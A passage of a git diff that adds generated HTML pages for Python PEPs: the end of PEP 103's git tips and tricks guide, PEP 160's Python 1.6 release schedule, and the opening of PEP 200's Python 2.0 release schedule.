+$ git checkout --track origin/master
+
+
+

The last command creates a new local branch master, sets +remotes/origin/master as its upstream remote-tracking branch and +checks it out into the working directory.

+
+
+

Branches and branches

+

Git terminology can be a bit misleading. Take, for example, the term “branch”. In git it has two meanings. A branch is a directed line of commits (possibly with merges). And a branch is a label or a pointer assigned to a line of commits. It is important to distinguish whether you are talking about commits or about their labels. Lines of commits are in themselves unnamed and usually only lengthen and merge. Labels, on the other hand, can be created, moved, renamed and deleted freely.

+
+
+

Remote repositories and remote branches

+

Remote-tracking branches are branches (pointers to commits) in your +local repository. They are there for git (and for you) to remember +what branches and commits have been pulled from and pushed to what +remote repos (you can pull from and push to many remotes). +Remote-tracking branches live under remotes/$REMOTE namespaces, +e.g. remotes/origin/master.

+

To see the status of remote-tracking branches run:

+
$ git branch -rv
+
+
+

To see local and remote-tracking branches (and tags) pointing to +commits:

+
$ git log --decorate
+
+
+

You never do your own development on remote-tracking branches. You +create a local branch that has a remote branch as upstream and do +development on that local branch. On push git pushes commits to the +remote repo and updates remote-tracking branches, on pull git fetches +commits from the remote repo, updates remote-tracking branches and +fast-forwards, merges or rebases local branches.

+

When you do an initial clone like this:

+
$ git clone -b v1 https://git.python.org/python.git
+
+
+

git clones the remote repository https://git.python.org/python.git to directory python, creates a remote named origin, creates remote-tracking branches, creates a local branch v1, configures it to track the upstream remotes/origin/v1 branch and checks out v1 into the working directory.

+

Some commands, like git status --branch and git branch --verbose, report the difference between local and remote branches. Please remember that they only compare with the remote-tracking branches in your local repository, and the state of those remote-tracking branches can be outdated. To update remote-tracking branches you either fetch and merge (or rebase) commits from the remote repository or update remote-tracking branches without updating local branches.

+
+

Updating local and remote-tracking branches

+

To update remote-tracking branches without updating local branches run +git remote update [$REMOTE...]. For example:

+
$ git remote update
+$ git remote update origin
+
+
+
+

Fetch and pull

+

There is a major difference between

+
$ git fetch $REMOTE $BRANCH
+
+
+

and

+
$ git fetch $REMOTE $BRANCH:$BRANCH
+
+
+

The first command fetches commits from the named $BRANCH in the +$REMOTE repository that are not in your repository, updates +remote-tracking branch and leaves the id (the hash) of the head commit +in file .git/FETCH_HEAD.

+

The second command fetches commits from the named $BRANCH in the +$REMOTE repository that are not in your repository and updates both +the local branch $BRANCH and its upstream remote-tracking branch. But +it refuses to update branches in case of non-fast-forward. And it +refuses to update the current branch (currently checked out branch, +where HEAD is pointing to).

+

The first command is used internally by git pull.

+
$ git pull $REMOTE $BRANCH
+
+
+

is equivalent to

+
$ git fetch $REMOTE $BRANCH
+$ git merge FETCH_HEAD
+
+
+

Certainly, $BRANCH in that case should be your current branch. If you +want to merge a different branch into your current branch first update +that non-current branch and then merge:

+
$ git fetch origin v1:v1  # Update v1
+$ git pull --rebase origin master  # Update the current branch master
+                                   # using rebase instead of merge
+$ git merge v1
+
+
+

If you have not yet pushed commits on v1, though, the scenario has +to become a bit more complex. Git refuses to update +non-fast-forwardable branch, and you don’t want to do force-pull +because that would remove your non-pushed commits and you would need +to recover. So you want to rebase v1 but you cannot rebase +non-current branch. Hence, checkout v1 and rebase it before +merging:

+
$ git checkout v1
+$ git pull --rebase origin v1
+$ git checkout master
+$ git pull --rebase origin master
+$ git merge v1
+
+
+

It is possible to configure git to make it fetch/pull a few branches +or all branches at once, so you can simply run

+
$ git pull origin
+
+
+

or even

+
$ git pull
+
+
+

The default remote repository for fetching/pulling is origin. The default set of references to fetch is calculated using the matching algorithm: git fetches all branches having the same name on both ends.

+
+
+

Push

+

Pushing is a bit simpler. There is only one command push. When you +run

+
$ git push origin v1 master
+
+
+

git pushes local v1 to remote v1 and local master to remote master. +The same as:

+
$ git push origin v1:v1 master:master
+
+
+

Git pushes commits to the remote repo and updates remote-tracking branches. Git refuses to push commits that aren’t fast-forwardable. You can force-push anyway, but please remember: you can force-push to your own repositories, but don’t force-push to public or shared repos. If you find git refuses to push commits that aren’t fast-forwardable, better fetch and merge commits from the remote repo (or rebase your commits on top of the fetched commits), then push. Only force-push if you know what you are doing and why you are doing it. See the section Commit editing and caveats below.

+

It is possible to configure git to make it push a few branches or all +branches at once, so you can simply run

+
$ git push origin
+
+
+

or even

+
$ git push
+
+
+

The default remote repository for pushing is origin. The default set of references to push in git before 2.0 is calculated using the matching algorithm: git pushes all branches having the same name on both ends. The default set of references to push in git 2.0+ is calculated using the simple algorithm: git pushes the current branch back to its @{upstream}.

+

To configure git before 2.0 to the new behaviour run:

+
$ git config push.default simple
+
+
+

To configure git 2.0+ to the old behaviour run:

+
$ git config push.default matching
+
+
+

Git doesn’t allow pushing to a branch if it’s the current branch in a remote non-bare repository: git refuses to update the remote working directory. You really should push only to bare repositories. For non-bare repositories git prefers a pull-based workflow.

+

When you want to deploy code on a remote host and can only use push +(because your workstation is behind a firewall and you cannot pull +from it) you do that in two steps using two repositories: you push +from the workstation to a bare repo on the remote host, ssh to the +remote host and pull from the bare repo to a non-bare deployment repo.

+

That changed in git 2.3, but see the blog post +for caveats; in 2.4 the push-to-deploy feature was further improved.

+
+
+

Tags

+

Git automatically fetches tags that point to commits being fetched +during fetch/pull. To fetch all tags (and commits they point to) run +git fetch --tags origin. To fetch some specific tags fetch them +explicitly:

+
$ git fetch origin tag $TAG1 tag $TAG2...
+
+
+

For example:

+
$ git fetch origin tag 1.4.2
+$ git fetch origin v1:v1 tag 2.1.7
+
+
+

Git doesn’t automatically push tags. That allows you to have private tags. To push tags, list them explicitly:

+
$ git push origin tag 1.4.2
+$ git push origin v1 master tag 2.1.7
+
+
+

Or push all tags at once:

+
$ git push --tags origin
+
+
+

Don’t move tags with git tag -f or remove tags with git tag -d +after they have been published.

+
+
+

Private information

+

When cloning/fetching/pulling/pushing git copies only database objects +(commits, trees, files and tags) and symbolic references (branches and +lightweight tags). Everything else is private to the repository and +never cloned, updated or pushed. It’s your config, your hooks, your +private exclude file.

+

If you want to distribute hooks, copy them to the working tree, add, +commit, push and instruct the team to update and install the hooks +manually.
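A minimal sketch of that workflow (the paths are illustrative, and hooks must be executable to run):

$ mkdir hooks
$ cp .git/hooks/pre-commit.sample hooks/pre-commit  # an example hook to share
$ git add hooks/pre-commit
$ git commit -m 'Add shared pre-commit hook'
$ git push origin master
$ # each team member then installs it by hand:
$ cp hooks/pre-commit .git/hooks/pre-commit
$ chmod +x .git/hooks/pre-commit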

+
+
+
+
+

Commit editing and caveats

+

A warning not to edit published (pushed) commits also appears in +documentation but it’s repeated here anyway as it’s very important.

+

It is possible to recover from a forced push, but it’s a PITA for the entire team. Please avoid it.

+

To see what commits have not been published yet compare the head of the +branch with its upstream remote-tracking branch:

+
$ git log origin/master..  # from origin/master to HEAD (of master)
+$ git log origin/v1..v1  # from origin/v1 to the head of v1
+
+
+

For every branch that has an upstream remote-tracking branch git +maintains an alias @{upstream} (short version @{u}), so the commands +above can be given as:

+
$ git log @{u}..
+$ git log v1@{u}..v1
+
+
+

To see the status of all branches:

+
$ git branch -avv
+
+
+

To compare the status of local branches with a remote repo:

+
$ git remote show origin
+
+
+

Read how to recover from upstream rebase. +It is in git help rebase.

+

On the other hand, don’t be too afraid of commit editing. You can safely edit, reorder, remove, combine and split commits that haven’t been pushed yet. You can even push commits to your own (backup) repo, edit them later and force-push the edited commits to replace what has already been pushed. This is not a problem until the commits are in a public or shared repository.

+
+
+

Undo

+

Whatever you do, don’t panic. Almost anything in git can be undone.

+
+

git checkout: restore file’s content

+

git checkout, for example, can be used to restore the content of file(s) to that of a given commit. Like this:

+
git checkout HEAD~ README
+
+
+

The command restores the contents of the README file to the last-but-one commit in the current branch. By default the commit ID is simply HEAD; i.e. git checkout README restores README to the latest commit.

+

(Do not use git checkout to view a content of a file in a commit, +use git cat-file -p; e.g. git cat-file -p HEAD~:path/to/README).

+
+
+

git reset: remove (non-pushed) commits

+

git reset moves the head of the current branch. The head can be +moved to point to any commit but it’s often used to remove a commit or +a few (preferably, non-pushed ones) from the top of the branch - that +is, to move the branch backward in order to undo a few (non-pushed) +commits.

+

git reset has three modes of operation - soft, hard and mixed. +Default is mixed. ProGit explains the +difference very clearly. Bare repositories don’t have indices or +working trees so in a bare repo only soft reset is possible.

+
+

Unstaging

+

Mixed mode reset with a path or paths can be used to unstage changes - +that is, to remove from index changes added with git add for +committing. See The Book for details +about unstaging and other undo tricks.
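For example, with a single file (standard git usage):

$ git add README    # stage changes to README
$ git reset README  # mixed reset with a path: unstage them again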

+
+
+
+

git reflog: reference log

+

Removing commits with git reset or moving the head of a branch +sounds dangerous and it is. But there is a way to undo: another +reset back to the original commit. Git doesn’t remove commits +immediately; unreferenced commits (in git terminology they are called +“dangling commits”) stay in the database for some time (default is two +weeks) so you can reset back to it or create a new branch pointing to +the original commit.

+

For every move of a branch’s head - with git commit, git +checkout, git fetch, git pull, git rebase, git reset +and so on - git stores a reference log (reflog for short). For every +move git stores where the head was. Command git reflog can be used +to view (and manipulate) the log.

+

In addition to the moves of the head of every branch git stores the +moves of the HEAD - a symbolic reference that (usually) names the +current branch. HEAD is changed with git checkout $BRANCH.

+

By default git reflog shows the moves of the HEAD, i.e. the +command is equivalent to git reflog HEAD. To show the moves of the +head of a branch use the command git reflog $BRANCH.

+

So to undo a git reset, look up the original commit in git reflog, verify it with git show or git log and run git reset $COMMIT_ID. Git stores the move of the branch’s head in the reflog, so you can undo that undo later again.

+

In a more complex situation you’d want to move some commits along with +resetting the head of the branch. Cherry-pick them to the new branch. +For example, if you want to reset the branch master back to the +original commit but preserve two commits created in the current branch +do something like:

+
$ git branch save-master  # create a new branch saving master
+$ git reflog  # find the original place of master
+$ git reset $COMMIT_ID
+$ git cherry-pick save-master~ save-master
+$ git branch -D save-master  # remove temporary branch
+
+
+
+
+

git revert: revert a commit

+

git revert reverts a commit or commits, that is, it creates a new +commit or commits that revert(s) the effects of the given commits. +It’s the only way to undo published commits (git commit --amend, +git rebase and git reset change the branch in +non-fast-forwardable ways so they should only be used for non-pushed +commits.)

+

There is a problem with reverting a merge commit. git revert can +undo the code created by the merge commit but it cannot undo the fact +of merge. See the discussion How to revert a faulty merge.
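If you nevertheless have to revert a merge commit, you must tell git which parent to keep with -m (standard git usage; the commit ID is a placeholder):

$ git revert -m 1 $MERGE_COMMIT_ID  # keep parent 1, the branch merged into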

+
+
+

One thing that cannot be undone

+

Whatever you undo, there is one thing that cannot be undone - +overwritten uncommitted changes. Uncommitted changes don’t belong to +git so git cannot help preserving them.

+

Most of the time git warns you when you’re going to execute a command that overwrites uncommitted changes. Git doesn’t allow you to switch branches with git checkout when that would overwrite uncommitted changes. It stops you when you’re going to rebase with a non-clean working tree. It refuses to pull new commits over non-committed files.

+

But there are commands that do exactly that - overwrite files in the +working tree. Commands like git checkout $PATHs or git reset +--hard silently overwrite files including your uncommitted changes.

+

With that in mind you can understand the stance “commit early, commit often”. Commit as often as possible. Commit on every save in your editor or IDE. You can edit your commits before pushing - edit commit messages, change commits, reorder, combine, split, remove. But save your changes in the git database: either commit changes or at least stash them with git stash.
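For example (standard git usage):

$ git stash        # save uncommitted changes away
$ git pull --rebase origin master
$ git stash pop    # reapply and drop the stashed changes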

+
+
+
+

Merge or rebase?

+

The Internet is full of heated discussions on the topic: “merge or rebase?” Most of them are meaningless. When a DVCS is used in a big team with a big and complex project with many branches, there is simply no way to avoid merges. So the question is reduced to “whether to use rebase, and if yes - when to use rebase?” Considering that it is very much recommended not to rebase published commits, the question is reduced even further: “whether to use rebase on non-pushed commits?”

+

That small question is for the team to decide. To preserve the beauty +of linear history it’s recommended to use rebase when pulling, i.e. do +git pull --rebase or even configure automatic setup of rebase for +every new branch:

+
$ git config branch.autosetuprebase always
+
+
+

and configure rebase for existing branches:

+
$ git config branch.$NAME.rebase true
+
+
+

For example:

+
$ git config branch.v1.rebase true
+$ git config branch.master.rebase true
+
+
+

After that git pull origin master becomes equivalent to git pull +--rebase origin master.

+

It is recommended to create new commits in a separate feature or topic branch while using rebase to update the mainline branch. When the topic branch is ready, merge it into the mainline. To avoid the tedious task of resolving a large number of conflicts at once, you can merge the topic branch into the mainline from time to time and switch back to the topic branch to continue working on it. The entire workflow would be something like:

+
$ git checkout -b issue-42  # create a new issue branch and switch to it
+    ...edit/test/commit...
+$ git checkout master
+$ git pull --rebase origin master  # update master from the upstream
+$ git merge issue-42
+$ git branch -d issue-42  # delete the topic branch
+$ git push origin master
+
+
+

When the topic branch is deleted, only the label is removed; the commits stay in the database and are now merged into master:

+
o--o--o--o--o--M--< master - the mainline branch
+    \         /
+     --*--*--*             - the topic branch, now unnamed
+
+
+

The topic branch is deleted to avoid cluttering the branch namespace with small topic branches. Information on what issue was fixed or what feature was implemented should be in the commit messages.

+

But even that small amount of rebasing could be too much in the case of long-lived merged branches. Imagine you’re doing work in both the v1 and master branches, regularly merging v1 into master. After some time you will have a lot of merge and non-merge commits in master. Then you want to push your finished work to a shared repository and find that someone has pushed a few commits to v1. Now you have a choice of two equally bad alternatives: either you fetch and rebase v1 and then have to recreate all your work in master (reset master to the origin, merge v1 and cherry-pick all non-merge commits from the old master); or you merge the new v1 and lose the beauty of linear history.
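A sketch of the first alternative (the branch names are illustrative; $COMMIT_ID stands for each non-merge commit from the old master):

$ git checkout master
$ git branch save-master  # preserve the old state of master
$ git fetch origin
$ git reset --hard origin/master  # reset master to the upstream state
$ git merge v1
$ git cherry-pick $COMMIT_ID  # repeat for every non-merge commit in save-master
$ git branch -D save-master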

+
+
+

Null-merges

+

Git has a built-in merge strategy for what Python core developers call a “null-merge” - a merge that records the fact of merging but takes none of the incoming changes:

+
$ git merge -s ours v1  # null-merge v1 into master
+
+
+
+
+

Branching models

+

Git doesn’t assume any particular development model regarding +branching and merging. Some projects prefer to graduate patches from +the oldest branch to the newest, some prefer to cherry-pick commits +backwards, some use squashing (combining a number of commits into +one). Anything is possible.

+

There are a few examples to start with. git help workflows describes how the git authors themselves develop git.

+

ProGit book has a few chapters devoted to branch management in +different projects: Git Branching - Branching Workflows and +Distributed Git - Contributing to a Project.

+

There is also the well-known article A successful Git branching model by Vincent Driessen. It recommends a set of very detailed rules for creating and managing mainline, topic and bugfix branches. To support the model the author implemented the git flow extension.

+
+
+

Advanced configuration

+
+

Line endings

+

Git has built-in mechanisms to handle line endings between platforms with different end-of-line styles. To allow git to do CRLF conversion, assign the text attribute to files using .gitattributes. For files that must keep specific line endings, assign the eol attribute. For binary files the attribute is, naturally, binary.

+

For example:

+
$ cat .gitattributes
+*.py text
+*.txt text
+*.png binary
+/readme.txt eol=crlf
+
+
+

To check what attributes git uses for files, use the git check-attr command. For example:

+
$ git check-attr -a -- \*.py
+
+
+
+
+

Useful assets

+

GitAlias (repository) is a big collection of +aliases. A careful selection of aliases for frequently used commands +could save you a lot of keystrokes!

+

GitIgnore and +https://github.com/github/gitignore are collections of .gitignore +files for all kinds of IDEs and programming languages. Python +included!

+

pre-commit (repositories) is a framework for managing and +maintaining multi-language pre-commit hooks. The framework is written +in Python and has a lot of plugins for many programming languages.

+
+
+
+

Advanced topics

+
+

Staging area

+

The staging area, aka the index, aka the cache, is a distinguishing feature of git. It is where git collects patches before committing them. The separation between the patch-collecting and commit phases provides a very useful feature: you can review the collected patches before committing and even edit them - remove some hunks, add new hunks, and review again.

+

To add files to the index use git add. Collecting patches before committing means you need to do that for every change, not only to add new (untracked) files. To simplify committing when you just want to commit everything without reviewing, run git commit --all (or just -a) - the command adds every changed tracked file to the index and then commits. To commit a file or files regardless of patches collected in the index, run git commit [--only|-o] -- $FILE....

+

To add hunks of patches to the index use git add --patch (or just -p). To remove collected files from the index use git reset HEAD -- $FILE.... To add/inspect/remove collected hunks use git add --interactive (-i).

+

To see the diff between the index and the last commit (i.e., collected +patches) use git diff --cached. To see the diff between the +working tree and the index (i.e., uncollected patches) use just git +diff. To see the diff between the working tree and the last commit +(i.e., both collected and uncollected patches) run git diff HEAD.
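A typical round trip through the index, then, is (a minimal sketch):

$ git add -p  # stage selected hunks interactively
$ git diff --cached  # review what is about to be committed
$ git commit
$ git diff  # see what is still left uncommitted in the working tree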

+

See WhatIsTheIndex and +IndexCommandQuickref in Git +Wiki.

+
+
+

Root

+

Git switches to the root (the top-level directory of the project, where the .git subdirectory exists) before running any command. Git remembers, though, the directory that was current before the switch. Some programs take the current directory into account: e.g., git status shows file paths of changed and unknown files relative to the current directory; git grep searches below the current directory; git apply applies only those hunks from the patch that touch files below the current directory.

+

But most commands run from the root and ignore the current directory. Imagine, for example, that you have two work trees, one for the branch v1 and the other for master. If you want to merge v1 from a subdirectory inside the second work tree, you must write commands as if you’re in the top-level dir. Take two work trees, project-v1 and project, for example:

+
$ cd project/subdirectory
+$ git fetch ../project-v1 v1:v1
+$ git merge v1
+
+
+

Please note that the path in git fetch ../project-v1 v1:v1 is ../project-v1 and not ../../project-v1, despite the fact that we run the commands from a subdirectory, not from the root.

+
+
+

ReReRe

+

Rerere is a mechanism that helps resolve repeated merge conflicts. The most frequent source of recurring merge conflicts is a topic branch that is merged into the mainline and then has its merge commits removed; that’s often done to test the topic branch and train rerere, and the merge commits are removed to keep the history clean and linear until the topic branch is finished with only one last merge commit.

+

Rerere works by remembering the states of the tree before and after a successful conflict resolution. That way rerere can automatically resolve conflicts if the same conflicts appear in the same files again.

+

Rerere can be used manually with git rerere command but most often +it’s used automatically. Enable rerere with these commands in a +working tree:

+
$ git config rerere.enabled true
+$ git config rerere.autoupdate true
+
+
+

You don’t need to turn rerere on globally - you don’t want rerere in +bare repositories or single-branch repositories; you only need rerere +in repos where you often perform merges and resolve merge conflicts.

+

See Rerere in The +Book.

+
+
+

Database maintenance

+

The git object database and other files/directories under .git require periodic maintenance and cleanup. For example, commit editing leaves unreferenced objects behind (dangling objects, in git terminology), and these objects should be pruned to avoid collecting cruft in the DB. The command git gc is used for maintenance. Git automatically runs git gc --auto as a part of some commands to do quick maintenance. Users are recommended to run git gc --aggressive from time to time; git help gc recommends running it every few hundred changesets; for more intensive projects it should be something like once a week, and less frequently (biweekly or monthly) for less active projects.
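A periodic maintenance session might look like this (a minimal sketch):

$ git count-objects -v  # check the number of loose objects and packs
$ git gc --aggressive  # prune dangling objects and repack the database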

+

git gc --aggressive not only removes dangling objects, it also repacks the object database into indexed and better optimized pack(s); it also packs references (branches and tags). Another way to do it is to run git repack.

+

There is a well-known message from Linus Torvalds regarding the “stupidity” of git gc --aggressive. The message can safely be ignored now: it is old and outdated, and git gc --aggressive has become much better since that time.

+

For those who still prefer git repack over git gc --aggressive, the recommended parameters are git repack -a -d -f --depth=20 --window=250. See this detailed experiment for an explanation of the effects of these parameters.

+

From time to time run git fsck [--strict] to verify the integrity of the database. git fsck may produce a list of dangling objects; that’s not an error, just a reminder to perform regular maintenance.
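For example (the object IDs are hypothetical and shortened):

$ git fsck
Checking object directories: 100% (256/256), done.
dangling blob 4a2b...
dangling commit 9f1e...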

+
+
+
+

Tips and tricks

+
+

Command-line options and arguments

+

git help cli recommends not combining short options/flags. Most of the time combining works: git commit -av works perfectly, but there are situations where it doesn’t. E.g., git log -p -5 cannot be combined as git log -p5.

+

Some options have arguments, and some even have default arguments. In that case the argument for such an option must be spelled in a sticky way: -Oarg, never -O arg, because for an option that has a default argument the latter means “use the default value for option -O and pass arg further to the option parser”. For example, git grep has an option -O that passes a list of names of the found files to a program; the default program for -O is a pager (usually less), but you can use your editor:

+
$ git grep -Ovim  # but not -O vim
+
+
+

BTW, if git is instructed to use less as the pager (i.e., if no pager is configured in git at all, so it uses less by default; or if it gets less from the GIT_PAGER or PAGER environment variables; or if it was configured with git config [--global] core.pager less; or less is used in the command git grep -Oless), git grep passes the +/$pattern option to less, which is quite convenient. Unfortunately, git grep doesn’t pass the pattern if the pager is not exactly less, even if it’s less with parameters (something like git config [--global] core.pager less -FRSXgimq); fortunately, git grep -Oless always passes the pattern.
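For example, to open every matching file in less, positioned at the first match (a minimal sketch; $PATTERN is a placeholder):

$ git grep -Oless $PATTERN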

+
+
+

bash/zsh completion

+

It’s a bit hard to type git rebase --interactive --preserve-merges HEAD~5 manually, even for those who are happy to use the command line, and this is where shell completion is of great help. Bash/zsh come with programmable completion, often automatically installed and enabled, so if you have bash/zsh and git installed, chances are you are already done - just go and use it at the command line.

+

If you don’t have the necessary bits installed, install and enable the bash_completion package. If you want to upgrade your git completion to the latest and greatest, download the necessary file from git contrib.
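One way to do the upgrade, assuming the completion script still lives at its usual place in the git source repository:

$ curl -o ~/.git-completion.bash https://raw.githubusercontent.com/git/git/master/contrib/completion/git-completion.bash
$ echo '. ~/.git-completion.bash' >> ~/.bashrc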

+

Git for Windows comes with git-bash, for which bash completion is installed and enabled.

+
+
+

bash/zsh prompt

+

For command-line lovers the shell prompt can carry a lot of useful information. To include git information in the prompt use git-prompt.sh. Read the detailed instructions in the file.
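A minimal sketch for bash, assuming the file was saved as ~/.git-prompt.sh (__git_ps1 is the function the file provides); put this in ~/.bashrc:

. ~/.git-prompt.sh
PS1='\w$(__git_ps1 " (%s)")\$ '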

+

Search the Net for “git prompt” to find other prompt variants.

+
+
+

SSH connection sharing

+

SSH connection sharing is a feature of OpenSSH (some other clients, such as PuTTY, offer something similar). SSH connection sharing is a way to decrease ssh client startup time by establishing one connection and reusing it for all subsequent clients connecting to the same server. SSH connection sharing can be used to speed up a lot of short ssh sessions like scp, sftp, rsync and of course git over ssh. If you regularly fetch/pull/push from/to remote repositories accessible over ssh, then using ssh connection sharing is recommended.

+

To turn on ssh connection sharing add something like this to your +~/.ssh/config:

+
Host *
+ControlMaster auto
+ControlPath ~/.ssh/mux-%r@%h:%p
+ControlPersist 600
+
+
+

See OpenSSH wikibook and +search for +more information.

+

SSH connection sharing can be used with GitHub, GitLab and SourceForge repositories, but please be advised that BitBucket doesn’t allow it and forcibly closes the master connection after a short inactivity period, so you will see errors like this from ssh: “Connection to bitbucket.org closed by remote host.”
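Because OpenSSH uses the first value obtained for each option, such hosts can be excluded with a more specific entry placed before the Host * block:

Host bitbucket.org
ControlMaster no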

+
+
+
+

git on server

+

The simplest way to publish a repository or a group of repositories is git daemon. The daemon provides anonymous access; by default it is read-only. The repositories are accessible over the git protocol (git:// URLs). Write access can be enabled, but the protocol lacks any means of authentication, so it should be enabled only within a trusted LAN. See git help daemon for details.
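A minimal sketch (the path and host are illustrative):

$ git daemon --export-all --base-path=/srv/git  # serve every repository under /srv/git
$ git clone git://example.org/project.git  # anonymous clone from a client machine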

+

Git over ssh provides authentication and repo-level authorisation, as repositories can be made user- or group-writeable (see the parameter core.sharedRepository in git help config). If that’s too permissive or too restrictive for some project’s needs, there is a wrapper, gitolite, that can be configured to allow access with great granularity; gitolite is written in Perl and has a lot of documentation.
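For example, a group-writable repository could be created like this (the path is illustrative):

$ git init --bare --shared=group /srv/git/project.git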

+

A web interface to browse repositories can be created using gitweb or cgit. Both are CGI scripts (written in Perl and C, respectively). In addition to the web interface, both provide read-only dumb HTTP access for git (http(s):// URLs). Klaus is a small and simple WSGI web server that implements both a web interface and the git smart HTTP transport; it supports Python 2 and Python 3 and performs syntax highlighting.

+

There are also more advanced web-based development environments that include the ability to manage users, groups and projects; private, group-accessible and public repositories; they often include issue trackers, wiki pages, pull requests and other tools for development and communication. Among these environments are Kallithea and pagure, both written in Python; pagure was written by Fedora developers and is used to develop some Fedora projects. GitPrep is yet another GitHub clone, written in Perl. Gogs is written in Go. GitBucket is written in Scala.

+

And last but not least, GitLab. It’s perhaps the most advanced web-based development environment for git. It is written in Ruby, and its community edition is free and open source (MIT license).

+
+
+

From Mercurial to git

+

There are many tools to convert Mercurial repositories to git. The +most famous are, probably, hg-git and +fast-export (many years ago +it was known under the name hg2git).

+

But a better tool, perhaps the best, is git-remote-hg. It provides transparent +bidirectional (pull and push) access to Mercurial repositories from +git. Its author wrote a comparison of alternatives +that seems to be mostly objective.

+

To use git-remote-hg, install or clone it, add it to your PATH (or copy the script git-remote-hg to a directory that’s already in PATH) and prepend hg:: to Mercurial URLs. For example:

+
$ git clone https://github.com/felipec/git-remote-hg.git
+$ PATH=$PATH:"`pwd`"/git-remote-hg
+$ git clone hg::https://hg.python.org/peps/ PEPs
+
+
+

To work with the repository just use regular git commands including +git fetch/pull/push.

+

To start converting your Mercurial habits to git, see the page Mercurial for Git users at the Mercurial wiki. In the second half of the page there is a table that lists corresponding Mercurial and git commands. It should work perfectly in both directions.

+

The Python Developer’s Guide also has a chapter Mercurial for git developers that documents a few differences between git and hg.

+
+
+

Git and GitHub

+

gitsome - a Git/GitHub command line interface (CLI). Written in Python, it works on macOS, Unix and Windows. It is a Git/GitHub CLI with autocomplete that includes many GitHub-integrated commands working with all shells, a builtin xonsh shell with a Python REPL to run Python commands alongside shell commands, command history, customizable highlighting, and thorough documentation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0103.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0160/index.html b/pep-0160/index.html new file mode 100644 index 00000000000..16a22eb1928 --- /dev/null +++ b/pep-0160/index.html @@ -0,0 +1,186 @@ PEP 160 – Python 1.6 Release Schedule | peps.python.org
+
+


+ + +
+
+
+

PEP 160 – Python 1.6 Release Schedule

+
+
Author:
+
Fred L. Drake, Jr. <fred at fdrake.net>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
25-Jul-2000
+
Python-Version:
+
1.6
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP describes the Python 1.6 release schedule. The CVS +revision history of this file contains the definitive historical +record.

+

This release will be produced by BeOpen PythonLabs staff for the +Corporation for National Research Initiatives (CNRI).

+
+
+

Schedule

+
    +
  • August 1: 1.6 beta 1 release (planned).
  • +
  • August 3: 1.6 beta 1 release (actual).
  • +
  • August 15: 1.6 final release (planned).
  • +
  • September 5: 1.6 final release (actual).
  • +
+
+
+

Features

+

A number of features are required for Python 1.6 in order to +fulfill the various promises that have been made. The following +are required to be fully operational, documented, and forward +compatible with the plans for Python 2.0:

+
    +
  • Unicode support: The Unicode object defined for Python 2.0 must be provided, +including all methods and codec support.
  • +
  • SRE: Fredrik Lundh’s new regular expression engine will be used +to provide support for both 8-bit strings and Unicode strings. It must pass +the regression test used for the pcre-based version of the re module.
  • +
  • The curses module was in the middle of a transformation to a package, so the +final form was adopted.
  • +
+
+
+

Mechanism

+

The release will be created as a branch from the development tree +rooted at CNRI’s close of business on 16 May 2000. Patches +required from more recent checkins will be merged in by moving the +branch tag on individual files whenever possible in order to +reduce mailing list clutter and avoid divergent and incompatible +implementations.

+

The branch tag is “cnri-16-start”.

+

Patches and features will be merged to the extent required to pass +regression tests in effect on 16 May 2000.

+

The beta release is tagged “r16b1” in the CVS repository, and the +final Python 1.6 release is tagged “release16” in the repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0160.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0200/index.html b/pep-0200/index.html new file mode 100644 index 00000000000..2f12ded201e --- /dev/null +++ b/pep-0200/index.html @@ -0,0 +1,478 @@ PEP 200 – Python 2.0 Release Schedule | peps.python.org
+
+


+ + +
+
+
+

PEP 200 – Python 2.0 Release Schedule

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
12-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP describes the Python 2.0 release schedule, tracking the +status and ownership of the major new features, summarizes discussions +held in mailing list forums, and provides URLs for further +information, patches, and other outstanding issues. The CVS revision +history of this file contains the definitive historical record.

+
+
+

Release Schedule

+

[revised 5 Oct 2000]

+
    +
  • 26-Sep-2000: 2.0 beta 2
  • +
  • 9-Oct-2000: 2.0 release candidate 1 (2.0c1)
  • +
  • 16-Oct-2000: 2.0 final
  • +
+
+
+

Previous milestones

+
    +
  • 14-Aug-2000: All 2.0 PEPs finished / feature freeze
  • +
  • 5-Sep-2000: 2.0 beta 1
  • +
+
+
+

What is release candidate 1?

+

We believe that release candidate 1 will fix all known bugs that we +intend to fix for the 2.0 final release. This release should be a bit +more stable than the previous betas. We would like to see even more +widespread testing before the final release, so we are producing this +release candidate. The final release will be exactly the same unless +any show-stopping (or brown bag) bugs are found by testers of the +release candidate.

+
+
+

Guidelines for submitting patches and making changes

+

Use good sense when committing changes. You should know what we mean +by good sense or we wouldn’t have given you commit privileges <0.5 +wink>. Some specific examples of good sense include:

+
    +
  • Do whatever the dictator tells you.
  • +
• Discuss any controversial changes on python-dev first. If you get a lot of +1 votes and no -1 votes, make the change. If you get some -1 votes, think twice; consider asking Guido what he thinks.
  • +
  • If the change is to code you contributed, it probably makes sense +for you to fix it.
  • +
  • If the change affects code someone else wrote, it probably makes +sense to ask him or her first.
  • +
  • You can use the SF Patch Manager to submit a patch and assign it to +someone for review.
  • +
+

Any significant new feature must be described in a PEP and approved +before it is checked in.

+

Any significant code addition, such as a new module or large patch, +must include test cases for the regression test and documentation. A +patch should not be checked in until the tests and documentation are +ready.

+

If you fix a bug, you should write a test case that would have caught +the bug.

+

If you commit a patch from the SF Patch Manager or fix a bug from the +Jitterbug database, be sure to reference the patch/bug number in the +CVS log message. Also be sure to change the status in the patch +manager or bug database (if you have access to the bug database).

+

It is not acceptable for any checked in code to cause the regression +test to fail. If a checkin causes a failure, it must be fixed within +24 hours or it will be backed out.

+

All contributed C code must be ANSI C. If possible check it with two +different compilers, e.g. gcc and MSVC.

+

All contributed Python code must follow Guido’s Python style guide. +http://www.python.org/doc/essays/styleguide.html

+

It is understood that any code contributed will be released under an +Open Source license. Do not contribute code if it can’t be released +this way.

+
+
+

Failing test cases need to get fixed

+

